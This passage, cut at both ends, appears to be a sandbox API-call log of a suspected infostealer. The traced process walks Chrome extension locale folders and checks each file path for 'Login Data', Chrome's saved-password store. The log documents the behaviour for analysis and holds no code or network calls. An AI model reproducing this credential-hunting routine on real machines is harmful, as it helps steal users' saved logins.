AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.590] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.590] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ro", cAlternateFileName="")) returned 1 [0161.590] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0161.590] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0161.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.590] lstrlenW (lpString="\\") returned 1 [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.590] lstrlenW (lpString="ro") returned 2 [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0161.590] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 137 [0161.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 137 [0161.590] lstrlenW (lpString="\\*.*") returned 4 [0161.591] GetProcessHeap () returned 0x8e0000 [0161.591] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0161.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*" [0161.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.591] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.591] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.591] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.591] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 137 [0161.591] lstrlenW (lpString="\\") returned 1 [0161.591] GetProcessHeap () returned 0x8e0000 [0161.591] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0161.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" [0161.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned 138 [0161.591] lstrlenW (lpString="messages.json") returned 13 [0161.591] GetProcessHeap () returned 0x8e0000 [0161.591] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" [0161.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" [0161.591] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.591] GetProcessHeap () returned 0x8e0000 [0161.592] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.592] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0161.592] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.592] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.592] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.592] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.592] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.592] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ru", cAlternateFileName="")) returned 1 [0161.592] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0161.592] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0161.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.592] lstrlenW (lpString="\\") returned 1 [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.592] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.592] lstrlenW (lpString="ru") returned 2 [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.592] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0161.592] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.592] GetProcessHeap () returned 0x8e0000 [0161.592] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 137 [0161.593] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 137 [0161.593] lstrlenW (lpString="\\*.*") returned 4 [0161.593] GetProcessHeap () returned 0x8e0000 [0161.593] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0161.593] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*" [0161.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.617] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.618] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.618] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.618] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.618] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.618] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 137 [0161.618] lstrlenW (lpString="\\") returned 1 [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.618] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0161.618] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" [0161.618] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned 138 [0161.618] lstrlenW (lpString="messages.json") returned 13 [0161.618] GetProcessHeap () returned 0x8e0000 [0161.618] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.618] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" [0161.618] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS 